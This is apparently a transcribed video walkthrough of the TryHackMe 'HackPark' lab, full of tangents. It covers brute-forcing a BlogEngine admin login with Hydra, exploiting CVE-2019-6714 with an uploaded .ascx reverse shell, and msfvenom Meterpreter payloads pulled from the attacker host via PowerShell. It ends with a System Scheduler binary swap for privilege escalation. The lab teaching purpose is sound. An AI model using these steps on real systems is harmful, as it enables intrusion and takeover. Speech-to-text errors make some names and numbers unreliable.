What up, you awesome sauce hackers? It's your boy, the humble hacker from Chi-Town, Chiron, and back with another walkthrough. And today, we are doing HackPark. Wow, that laugh went a little bit long there. Sorry about that. Moving on. From TryHackMe Confession. Since Sony continues to be a crappy fat rat pack of prairie dog jack holes, I ain't messing with it for the moment, and I'm sticking to my Oculus. My mind can of course be changed if any of you amazing hackers want to do a co-op, or if I should just stream on Twitch or something. This whole PlayStation debacle is worse than a 90s superhero nightmare. To summarize the idiocy of this comic is that a dude gets struck by lightning and suddenly is both able to sense evil and is a permanent insomniac. They also mention that he plays the saxophone, and when he goes off to stop crime, he has a holographic projector that is more advanced than Coachella. What happens if it shorts out? What if there's a drunk heckler that wants to fight him and jumps on stage while the hologram is just there looking like Bill Clinton when he appeared on the Arsenio Hall show, just standing there rocking away while the heckler's all up in the hologram's face? Sorry for that rant. Freaking hate that show. Anyway, moving on. For this machine, we will be dabbling into some je sais goodness. We'll be tinkering with Hydra. Sorry, I meant Hydra. Saw Godzilla vs. Kong, and oh my god, it was awesome sauce. We'll be exploiting BlogEngine by manipulating an ASP.NET web user control file extension .ascx, or active server control extension, and connecting through Netcat, making a reverse shell with MSFVenom, working with Metasploit, manipulating another file on the target system, using MSFVenom again, and finally working with PowerShell. Wow, that was a lot to unpack, wasn't it? Now, let's do the thizzle dazzle, and without any further ado, let's get it. And now, the real game begins. With our in-map scan, of course, and we're going to be running it with in-map-sc for using safe scripts, SV to do numerate versions, -p- for all ports, -08 output all formats, and our IP address, which is right up in here. And we run that. Now, since I already ran it, check out the results here. If I can. And there we go. Okay. So, we have two ports open. We have port 80 and we have port 339. Now, we have some ASPX files here. So, let's go with GoBuster and see what we can dig out. So, we're going to run this by using GoBuster. Using the directory busting module, specifying our word list. And we're going to be using a different set of extensions. A bigger set of extensions, actually. So, what I want to do, I want to get a config file. Whoops. ASPX, since we already found them. And we want to do maybe PH7, exe, HTML. ASPX. What in the flip mode, squad? There we go. Dang it. sh txt URL is that. We can do output. .txt threads 200. And we go ahead and run that. Now, I already ran it, so just go ahead and check that out. And we have an extensive list of, dang, that's a lot of directories there. All right, let's start from the tippity top. Okay, go over our main page here, which, hey, clown, hate clowns that look like Tim Curry. All right, Tim Curry is amazing, just not when it looks like that. All right, so let's take a peek at our source code here. See what we can dig out. Right. Scroll down, down, down. Oh, there we go. Look at this. We have a software name, and version. All right. Let's go ahead and clear this out. No, actually, no. Let's make a notes here. Okay. Paste that and put it in our booty pocket. All right. Label this as notes. And let's keep it moving. What is our next path that we found? That was right over here. Okay, scroll up. There we go. Let's shrink this down a little bit just so we can have a good side-by-side view here. Right, and let's check search in lowercase letters. And what do we get? All right, we get a search here. All right, let's go ahead and do like a generic XSS test. Let's do apostrophe, double quote. I think that's less than. Greater than. IMG SR image source equals X on error. And see what that gets us there. Nada. Okay. Just seeing what that does. Tag. Nope. Okay. Just thinking around to see what we can pull off from here. Let's see if there may be LFI. 1, 2, 3, 4. Remove that apostrophe there. Whenever we see LFI, always start with the default 4 directories up. So actually, let's just see if that gets us anything. No. All right. So let's just move on. Next up, contact. Better not be no damn clown. I'll tell you that right now. Don't you give me no contact info for no clowns. Don't you do it. Don't you do it. Okay. I'll answer the mail as soon as I can. Ahoo! You already got a scary clown on here. What are you, the Beelzebub? Or maybe... Who was it? Was it John Wayne Gacy? The one with the clown makeup on? Something like that. Might be wrong. Can't remember offhand. Let's look at archive. Okay, blogengine.net. Okay. Contact us. We already looked at that. Look at content. Access is denied. But we have an admin here. Let's look at that. Looks like that we're brought to an admin page. Okay, so let's look at what we can find for this one. Let's take this out of our booty pocket and put that right over here. Whoops. I didn't say that. I said that. There we go. Okay, so looks like we got a couple of entries here for exploits for BlogEngine version 3.3.6.0. So we have directory traversal in RCE. Same thing. Same thing. Same thing. Okay, so it looks like these are going to be the only two that we're going to have. And let's start from this here. So, directory traversal, remote code execution. It's CVE ID 2019-6714. And the actual ID number is 46353. Okay. So let's look at it. Okay. Path traversal vulnerability leading to remote code execution. Attack. First, we set up CVE address and report within the method below our attacking host. Okay, so it looks like that we may need to already be logged in first, but we don't have that login. Let's see if this particular version may have default login. I know I missed that 6. Don't remind me. default login. There we go. Looks like that. We don't really have much. All right, just keeping our bases covered. So what's our next option? Our next option is by password cracking, and the tool that we're going to be using for that is Hydra. Hail Hydra. Kidding. All right. Now, how is this going to work? First off, we're going to need, since we don't have any info as far as login information, and we want to try to just go straight to the top and maybe look for just regular admin credentials, that's the username that we're going to start with. But we're going to need the data from the post request that this page will create here in order to use it, and in order to see like what parameters that we're going to be using. Sorry that I started to ramble it and my brain froze and I started to stutter. Okay, so how are we going to use Hydra? We are going to be taking the data from the post request from this login and feeding that into Hydra. That way Hydra can crack the password. There. Woosa. Okay, now, how do we find the post data info that we need? We need to use developer tools. So, anywhere on this page right here, let's go on expect element. Just go there. And let's go over to our network tab. So let's go and put in some generic login. This is Cribbity Crap. Let's start with that. Cribbity Crap. And let's go click login. And we have our post request right here. The same URL that's right up here. Now let's look at the request and see what we find here. The request payload that we're going to be using is this here. And this is going to consist of all the data that this will need, and it'll also have this information here as well. So now, how do we use it? We need to keep copy of this because this is the error message that we want to avoid here. Okay. So let's see how we will be using this. How Hydra works for these, this is an HTTP post form. So how Hydra is going to work on this is we're going to do, actually, let's bring up the help menu. So how, actually, let me back it up a step. We're going to specify our username, specify our password, use verbose mode, and then enter in the request that it's running against, which is going to be a HTTP form post right there. We're going to enter in like the request data, then use the -F switch to exit when a login pair is found. So let's go to the help to see why we're using these. Now, the reason why we're using a lowercase l is because we're only looking at one particular username. We use a capital P for the password setup because we're using a password list. But if it's best case if we use it in where we have one but not the other. We can use both, but where we don't have any information for both, and using a username file and a password file, but that's going to take a really long period of time. So it's best to either do one or the other. If we have a username but no password, we're going to use the lowercase l for the one username and the capital P for the password file. If we have the reverse of that, if we have a password but no username, then we use the -L for a login file for a list of usernames to try this one singular password with the lowercase p up against. We have where's our verbosity right here, our verbose mode. Right there, that was that next switch that we had. Then the quitting on successful login, which is right here, is either going to be -lowercase f just for the one host, or if we're doing a large list of hosts, we're going to use the -F. Now, with that being said, let the fun begin. All right, we're going to go ahead and enter in Hydra. Next, we're going to just pick one name out of a hat, and it's admin. Let's just do that just because. Specify our password file with a capital P. And we're going to use the RockU word list here. Specify our IP address, which is going to be right here. going to do the capital V for the verbose, specifying what we're doing this against. HTTP form post, and specifying our main path where this is at is here. Okay. The rest of the stuff is the response from this login being failed. That's why I did not use this here. All right, so we have that. Whoops, I have to keep this right here. And we're going to do colon. And now we're going to take this payload data right here. Set that right at the booty into this. As you can see, it has both the view state and the event validation right there, which is this here and this here. So it's all in one line. All right, now that we have that, I think I need to get rid of this space here. Okay. We have our main content and the two parameters that we got. We have the, where is it? Username right there. Password right here. So these are the two that we're going to be using to feed it in this thing. So next that we do is specify our, let me see. Where is that? Wow, this is trying to decipher all this stuff. Okay. Oh, red. Oops. One second. Let me find out where that went. Oh, duh. Sorry. I thought I was reading this wrong. All right. So now at the tail end of this, okay. Now I remember. Trying to read this and I got super lost. All right, so we have to add in the error message that we don't want, which is login failed. So you will not respond on that. We use -F again to quit once we find a valid key pair, and now we run it. Hang on one second. Apparently need at least the strings of. Oh wait, okay. Whoopsies. Where is that? Here we go. I gotta go back through here where username equals, that's what I was looking for, equals user. Then I'm gonna change this to pass, and now we run it. So we had to add the parameters that's going to be fuzzing. By removing what was in the username field, removing what's in the password field, and just having where it says user and pass right there. So now this is running here. And what this is doing is taking just the one username of admin and then running it against our entire password list until it finds a match. Sorry, I just needed this little sip of water. So apparently they released a new Black Widow trailer today that says that it's supposed to be releasing in July. I stopped caring. I really did. All that annoying push back of the release date, I was just like, I don't care. Just release it. The excitement ain't there no more. Unless they make Taskmaster badass, then I'll be like, okay, I'll maintain the anticipation. But I was just like, I treat it like Cyberpunk 2077. I'm like, okay, I get it. This is going to be a huge disappointment while playing, is to crap on that hat, or in it, whichever one that you prefer. This list is taking a fairly long period of time. Oh yeah, that's right, because there's, wow, it's like moving so freaking fast, it's making my eyes spin. What's that, 14 million? Is that 1 million? 434,000. No, that's 14,344,398. Hey, look at that. We have a password match. Yee-hee! All right. Nice way to kill time there. All right, so we have our potential login here. So let's go ahead and take that. Put that in the booty pocket right there. Save that so we don't miss anything out. So we don't miss out on anything, I should say, instead. Sorry for that little stamble jamble. Now let's take this here and go to the page. Remove this, switch it with admin. We can close our developer tools right there and log in. See if this works. Does it work? Does it work? Hey, look at that. All right. So, looks like that we are in BlogEngine, logged in as admin. A lot of rhymes there. And let's start navigating through this here. Let's go over this exploit here again and see what we're supposed to be doing. All right. So, path traversal. Okay. All right. So, let's do this here. Let's take this file because this is running a script here. Okay. Now we have some important information. All right. So what do we do? First, we set the TCP client address import within the method below to our attack host, who has a reverse TCP listener waiting for connection. Next, we upload this file through the file manager in the current 3.3.6 version of BlogEngine. This is done by editing a post, so we have to edit a post and click on the icon that looks like an open file in the toolbar. Note that this file must be uploaded as a post view.ascx. So we have to make this file name. Okay, so let's go ahead and copy that text right there. Once uploaded, the file will be in the app data files directory off of the document root. The admin page that allows upload is this. Okay, so that must mean that we have to navigate to here. So let's find it. Okay, let's take a peek. All right, so we're in the posts. Let's move this over here. Make it easier to organize this stuff. All right, so we got a post right here. Welcome to HackPark. And what do we got? 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 All right, so let's save this first. Okay, let's go and save file. Let's go to said file, which is right here. Rename. Okay, postview.ascx. Now, let's find where we can upload this stuff at. And actually, we're supposed to edit this. Let's open with a text editor. Actually, I believe I already have this done, so let's take a peek at it. Desktop. Okay. Now where are we at? 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 Here we go. Okay, so let's open this with a text editor here. And this is the portion right here where we're going to edit it with our IP address and the port that we want to use. Now let's confirm this information here first. Okay. Take this here. All right, password is different. So we're going to go ahead and save this. Close that out. Set up our, oops. Let's do it like this instead to make it easier. Set up our netcat listener here in C, and we're going to use the flags NLVP 4445 for our port. So now I'll be listening on port 4445 or on port 445, one of those. Okay. Now we navigate to where, ooh, wow, Pennywise big ass head just like scared me. All right. So where are we navigating to? We're going to be navigating to here. Okay, so let's navigate to there. Okay, we are in it's here. Didn't want to get rid of the admin because we need to be in the admin page. Okay. Okay, so where can we upload a file here? Let's go right back here and see where we can dabble. Okay, so we have this picture right here. Hang on, let me just read this one more time. Oh, here we go. Sorry, stupid. Okay, so the page that we need is this one. All right, so let's go to the end of. Oh, okay, so it is right here. All right. Okay. Okay, so we are in the edit post already. So let's see where we can upload a file. Okay. Oh, okay, that's not doing anything. All right. Thanks for wasting my freaking time. All right. Let's start navigating this thing here. See where we can upload a file at. Okay, let's go to categories. Okay. All right. What is this? Change password, profile. View my blog. Should bring this back to HackPark. Yes, it does. Okay. Okay, so let us find the file. Where can we upload stuff? Up in here. Okay, so let's try some of these again. All right. Comment left by a visitor. I don't care. Don't care about that either. Okay. Let's see. I want to find where all the files that are on this page are held. So that's a little bit tricky. Okay. Be patient. We can figure this out. Okay, where else? Okay, so we have a post that we have to edit. Okay. Okay, so we should edit this. And let's find a certain file we need to look for. Alright, so if this is the file manager, it should populate some data for us. So we may have went the long way around. Alright, so you're gonna populate something. Thank you. Okay, here we go. And the destination for the file that we're going to be using is supposed to be located here, which, as this says, that's where it is. So let's go over to our upload here and over to our TryHackMe box there. We have this file that we're supposed to be uploading. Okay. It has completed. Okay. Now, let's navigate to that by what this says here. Whoops, wrong path. There, gonna need this whole thing. So after admin, paste that there. Admin, files, post view, ASCX, and let's look for it. Hang on. Let's just go straight to here instead. Okay. Alright, it says error loading pages. Let's try to manually navigate to this here. Okay, go back to our file manager. Okay, so okay. Hang on one moment. Where? Let's get rid of this. And try this path again. Okay, let's get rid of app. Go right there. And I ran this thing again. Post .ascx. Huh. It says error loading the page. Okay, that's super weird. Let's try with app here. Okay. That doesn't work. And now this thing keeps saying that it's having an error loading the page. I wonder why. Alright, let's go back to our file manager. Okay, so let us try this some other place. Let's go to here, open up a new tab there. Okay. Okay, so we have URL. And app data files. Let's do just like a save all on that. See if we could find anything, which we don't. Okay. Let's just tinker around with this to see what we can dig out. Okay, still nothing here. Let's go ahead and cat this. Alright, let's look at our IP. Oops. Oops. I was trying to scroll up and accidentally went through the damn history. Okay. So we have this set. Okay, app data. Alright, listening on port 4445. Okay, so where? Alright, let's try to go back again. Okay, go back to our posts. Here. Okay, so where do we find this path, though? That's the tricky question. Okay, here we are. So admin app editor. But this says app data files. Let's try this one. Oops, double slash. Gotta get rid of that. And crap. Okay. Let's get rid of app. Crap. Huh. Where is this damn thing? Alrighty. Let's keep it. Let's keep. Yeah, we're making progress. We just got to keep going. All right. Let's see. Trying every possible combination that we could think of to get this to fire. Let's look at our IP address again. Oops. Okay. 10.935.129. 10.935.129. Wait. Ah. Hang on. Hang on 1 second. This is not entered correctly. I am missing parentheses, looks like. I mean, yeah, double quotes. Okay, let's confirm that. Yep, missing another double quote right there. All right, so let's go ahead and fix that. So now we're making some progress here. Let's just pico to that. Okay. Now we fix our IP right here. Okay. Make sure we got a match. Yes, we do. Okay. Now let's try this again. Let's delete this. Now we can re-upload this file here. Yes, it was saved. Now this is complete. Now let's try this again. Okay, app data files. Okay. What was that URL again? Oops. Where was it? Where was it? Let's go back here. All right. So let's copy that. Go back up here. Oops. Okay. Okay, post view. Where is that? There you are. Okay. Bring our browser back up here. And let's see what this does. Okay, looks like it's still loading. And taking its sweet time. Okay, let's try another one. App editor. Okay, so nothing there. Let's clear this part out. See if we can get back into the main app. Okay, and let's just try like this instead. Okay, so we're at the base right here. Let's go question mark theme equals data files. Crap. Huh, okay, so nothing's firing over here. Did this finish? Okay, so it did. Very interesting why this is not working. Let's go through here. Check out our file manager again. Okay, so doing that does absolutely nothing. Let's try this. Let's go to the post. Oh, bollocks. Huh. Wonder why I can't trigger this anywhere. Okay. So let's try a different method. Let's go ahead and save this. Use curl. What is our IP? Okay. Get that admin path. All right. Let's clear all this out. Make sure that we get the admin page right there. Okay. So we get that. All right. Whoops. 2 slashes. Can't have that. Okay. Goals. Whoops. Files. So now we have some more insight on where this moved to. So let's try this one out. Hang on, is this the same? Okay, let's try this now. Oh, serious? No such file or directory? You suck. No. What? Where the hell did that come from? Still trying to navigate through this thing to get this thing to trigger here. Okay. Give me one moment. I'm going to go ahead and pause this here and see what I missed. Ah, wait, think I found out what was wrong. Sorry, it took me like about 4 seconds to figure it out. Okay, now I think I see where I went wrong. Maybe I should have just did just that instead. Yeah, sorry. I had to like think about it for a second. I had to go back and forth between the exploit between this document and what I was doing, and ugh, God, so annoying. Okay, pays to be thorough. All right, so let's try this again, where we just clear out everything else and just go app data files now. Now, what do we have? Now let's see if this works. And look at that, it does. All right, finally. Okay, so let's see what we can do with this. Let's see if we can we get, okay, so we have a directory, but we don't really have a shell though. So this is not really all that good. Okay, let's think. How can we fix this? All right, we have kind of a shell. This should have PowerShell on it. I think. Oh. Alright, didn't really give me much of a response, but just gave me a prompt. Okay, and shows where we're at right now. iNet serve here. Let's see if we can... CD... Let's see if we can look at the program files here. Alright, so it looks like that it does have Windows PowerShell. Alrighty, so now what can we do? Let's see if we can upload a reverse shell, hopefully, and then see if we can call it from here. Alright, so now that we have our shell, let's first do our privilege-escalation stuff now. First thing that we always got to do is find the first available folder we can upload something to without having to run into any issues. And the number one folder to do that is the CD C. There we go. And we got our Windows. There should be temp folder. Let's make sure that that's it. And wait, hang on 1 second. Let's try this again. CD C. Okay. All right, there we go. We got temp. Okay, so gonna navigate to that temp folder right there. And since we have PowerShell, we're gonna use that to download some files here. So let's go over to where these are at. So we got we have privilege. Actually, what I want to do in here is, hang on 1 second. Let me find here. Since this is Windows, we're going to be using WinPs. Okay, let me have this open right there. lowercase. Okay. Wait, what is that? Hang on. Let's just use the bat one instead. Not the bat phone, but this one instead. The .bat file. Okay, cool. All right. So, what we're going to do hither is create an MSFVenom payload here that will be a reverse shell to our system. Now, I always have a secondary tab open so I can have my IP address listed there. So, let's go ahead and copy that while it's there. Makes it easier. So, how we're going to put this together. Now, we have MSFVenom. We specify what payload that we're going to use. And since this is a Windows system, we're going to use the interpreter shell here. So, in Windows, we're going to interpreter. This is a staged payload here. It goes in stages. This folder, this folder, this folder, and then the this folder, this folder, this payload. My bad. Okay, now it's going to specify our. Whoops, hold on. Reverse, not shell, just reverse TCP. Forgot all about that. We specify our L host. Specify our L port, which we will do. Let's go in order. 4446, and we're gonna save this. Oh, crap, using a hat as the format. There we go. As exe. Output the file. Reverse.exe. Okay. And we're going to wait for that to produce there. All right. See if it's there. Okay. We have reverse.exe right here. All right. Clear this out. Go over to our interpreter. Since we're working with a interpreter payload, we're going to need our interpreter module in order to catch this payload, which is going to be the multi-handlers. So we're going to search multi-handler, and to use this, instead of having to type this whole thing, we can just which is like use exploit multi. We can just bypass that and say, just give me the number 6, bro. Right there, buddy. Thank you very much. We're gonna go open up our options here. We're gonna switch this payload, and we're going to do show payloads to give us a list of what to use, of what we can use with this particular exploit. There we go. That's a lot. All right, so we're gonna use Windows. There we are. There we are. I can copy this, or but I kind of need to use it to set the payload here. Set payload. Okay, options. If I just use the use and the number here, it would have populated this and not this. All right. So, and just to show that, what was that number again? I'm gonna say use 545. Okay, index module. Okay, good. Looks like we don't have a problem. All right, my bad. Don't shoot the messenger. I have no idea what that means. All right, so let's set our L host here. Okay, we're gonna use that. Set our L host. Okay. All right. Now we're gonna run this here. It's gonna present a message saying it's gonna be waiting. So, yep, starting the handler right there. Next, in our session that we had for netcat, here we go. Sorry about that. Right here. And now we're gonna call our machine. Okay, that's reverse. We're gonna call our machine and pull this file down and upload it here to the target. So we're gonna go Python m http server. Wait, oops, duh. 3. Sorry about that. All right, there we go. All right, so let us use PowerShell to download this file. We're going to go PowerShell, invoke web requests URI. Okay, where's our IP address? 10.9.35.129 on port 8000. The file name is reverse.exe. Specify our output file. Reverse.exe. Okay. And our HTTP server picked it up. Gave us notification that it got a 200. So the file was grabbed. Let's go down here. Open this up. Oops, stupid. That's Linux, not Windows. And we have our reverse shell file here. So what is next? We are going to now execute this file by simply typing reverse.exe, going over to our Metasploit, which should be picking this up. Okay, so it is not. Where did we... Okay. Where do we make it? Where do we make it? Oh, stupid. Okay. Oops, sorry about that. All right, so we're going to close this out. Forgot to change the port. There we go. Now we're cooking with some gasolina. So let's start the exploit again. All right, starting the reverse handler. Now we go back to where this was. Run it again. Reverse.exe. Now we go to our Metasploit, and there. We have a command shell that just opened. Okay. Where is that? All right. Here, let's see. Oh, that's why, because it had a generic reverse shell. It didn't put the one that I actually wanted in here. So let's go back up here. Find our payload here. Okay, copy that. Pays to be thorough. All right. Okay, here we go. Now it's set correctly. Run the exploit again. Run, oops, reverse.exe again. Go back over to our Metasploit module. Sending stage. There we go. That's what we want to see. Interpreter session open. Thank you. Okay. Let's wait for that actual prompt to pop up. And there we go. Now we can begin the fun. Let's start with our enumeration, post-exploitation, running sysinfo, seeing what this machine actually is. Okay, so this is HackPark, Windows 2012, R2, 6.3, build 9600. Let me take a sip of my water. Refreshing. Okay. Let us run PS to see what running processes there are. Okay, so IIS app pool blog. Looks like this our main user here. Okay, we have some normal Windows processes. Okay, like agent command, server, correct. Here's our file right there and right there. Okay, have you scheduled a task host X Explorer message? Oh, that's weird. What is that? Let's try this again. See if we see anything yet. Huh. Let's see. Looks like the message is gone now. So that is odd. Okay. See if it's running a weird scheduler here. Let's see if it's running a scheduler. So let's go over to CD. C program files x86 unmatched. Oh, duh. And for clarification of why I'm doing it like this here, it's because Windows errors out if there's a space in the path, because it looks at everything as one simple word. Or if there's a space, it'll look at it like it's individual. So instead of trying to navigate to C program files, parentheses x86, it'll go, okay, change directory to program, and then change directory to files, and then change directory to x86, which is not what we want. All right, so let's see what's in this directory. All right, we have common files, of course, Internet Explorer, Microsoft.net, System Scheduler. All right, so all information, which is PowerShell desktop.ini. All right. Let's look at System Scheduler here. I accidentally capitalized the letter on accident. My bad. Okay, and looks like message.exe is there. All right. So let's see if we can play with this here. Let's rename this. So we're going to change the name from message.exe to message.back. All right. Oops. Let me see if I can. No, you know what? No. Okay. Let us copy this. Paste this right down here. Oops. There we are. Confirm that was done. Okay, here we go. There it is. Now let's make our own here. Okay, let's change this port to 4447. All right. So everything's going to be exactly the same. We're just changing the port and actual file name. So let us just change this to one message.exe. Let this run. While that's running, let's go back over to because we're going to need to pick this up. So let's start another interpreter session so we don't lose this. Okay. Okay, so now we have that created. Let's go to our session here. CD. What is it? C. Windows temp, I believe. There we go. Okay. Let's search for multi-handler here. Okay, there we go. Use 6. I said use 6. Thank you. Gosh. Let's go all the way up to the top and copy this payload here so we don't have to do it again once we can find it. Where did I put it at? There you go. Let's just copy that. Put that right there. Set the L port to 4447 and get our IP address again. Put this right here. Okay. Whoops. There we go. L host. Okay, let's have that sitting there. Let it marinate. And we're going to keep this open, and we're going to pull this new file down now. So let's actually go to where that file actually is first. So where was it? Scroll up. All right, hang on. Where was that at? Oh, right. It was in the scheduler. Okay. All right, system scheduler. Okay, so CD, double quote, C, and we want to go to program files, oops, x86, right? Okay. System scheduler, right? All right, this is the folder that we need. Message.back is right there. So now we can use PowerShell again. So we go and go PowerShell. Invoke web request. URI. HTTP, not hippo. 10.9.35.129. Colon on port 8000. Message.exe. Now let's go ahead and send that up there, see if it'll get grabbed. And yes, it did. Hold on 1 second. Let's make sure. Okay. Let's see what we got. And looks like it did not. So wait. I think I may. Okay, I think I didn't put in everything. Let's see. Ah, no, I did not. Okay, that's where we went wrong. We did not set the output file. So let's fix that. Whoops. Okay. Paste that there. Okay. Try this again. Okay, so we got a 200. Oops. Freaking crap. Typo. Stop fat fingering it. Out file. There we go. Okay. Now we should be fine. All right. So there's our hang on 1 second. Okay. Can I delete this? Okay. Now let's try it again. Let's make sure it's not in there. Yes, it is. Hang on 1 second. Crap it. Should not have done that. Going a little bit too fast. Okay. All right. Whew. Alrighty, so let's try this again. All right. Let us go back over to here. Okay. Okay. And I see where I also messed up. So I'm going to go fix this because it was as one message. Okay. All right, let's see if it worked. Craps, no it did not. What the H? Whoops, wrong one. Okay. Start this up again. Hang on. Let's move this to the trash. Rename. All right. Okay. Okay, so what are we missing? All right. Okay, so we invoked PowerShell. Huh. This is very weird. Okay, why is it not picking up this file now? This is freaking confusing. All right. Let's try this again. Because the file's there, but it's acting like it doesn't want to get it now. Okay, let's try this again. Okay, so we have it there. Start this again. And okay, message back. Okay, so we got PowerShell. Invoke. Rep request. URI. Okay, 10.9.35.129. Okay, on port 8000. Message.exe out file. Message.exe. Okay. So we should, there we are. Okay. Final freaking late. All right, so now that we have that done, we need to wait for this new exploit handler to generate our reverse shell. Let's make sure that it's here. Scroll up. There we are. Message.exe. Okay. And let's just simply wait for the shell. I don't want to jump the gun. And look at that. We got something here. Setting the stage, and we have an interpreter session that's open. Fantastic. All right. Wait for, there we are. Let's see who we are. Okay, sorry for that. Let's go ahead and run the directory here. Go to our base directory. Oops. And we are admin. Okay, so let us get with the navigation. Okay, so let's go straight to the C drive right there. There we are. Go to our users. Let's go talk with Jeff. All right. Let's check his desktop. And there is his user file. So let's go back some steps. Actually, let's just do it like this. Hang on. There we go. CD, C. Administrator. There we are. Let's go to the desktop. And there is our root flag. Whew! That was a lot. Oh my days, that took a long time. Over an hour. So sorry for that. I will try to make sure that that does not happen again. So that's pretty much it for HackPark. I hope you guys had fun and were just as patient as I was with it. Don't forget to like this video, share, and subscribe to be notified of future content. I am Sharon, and I am out.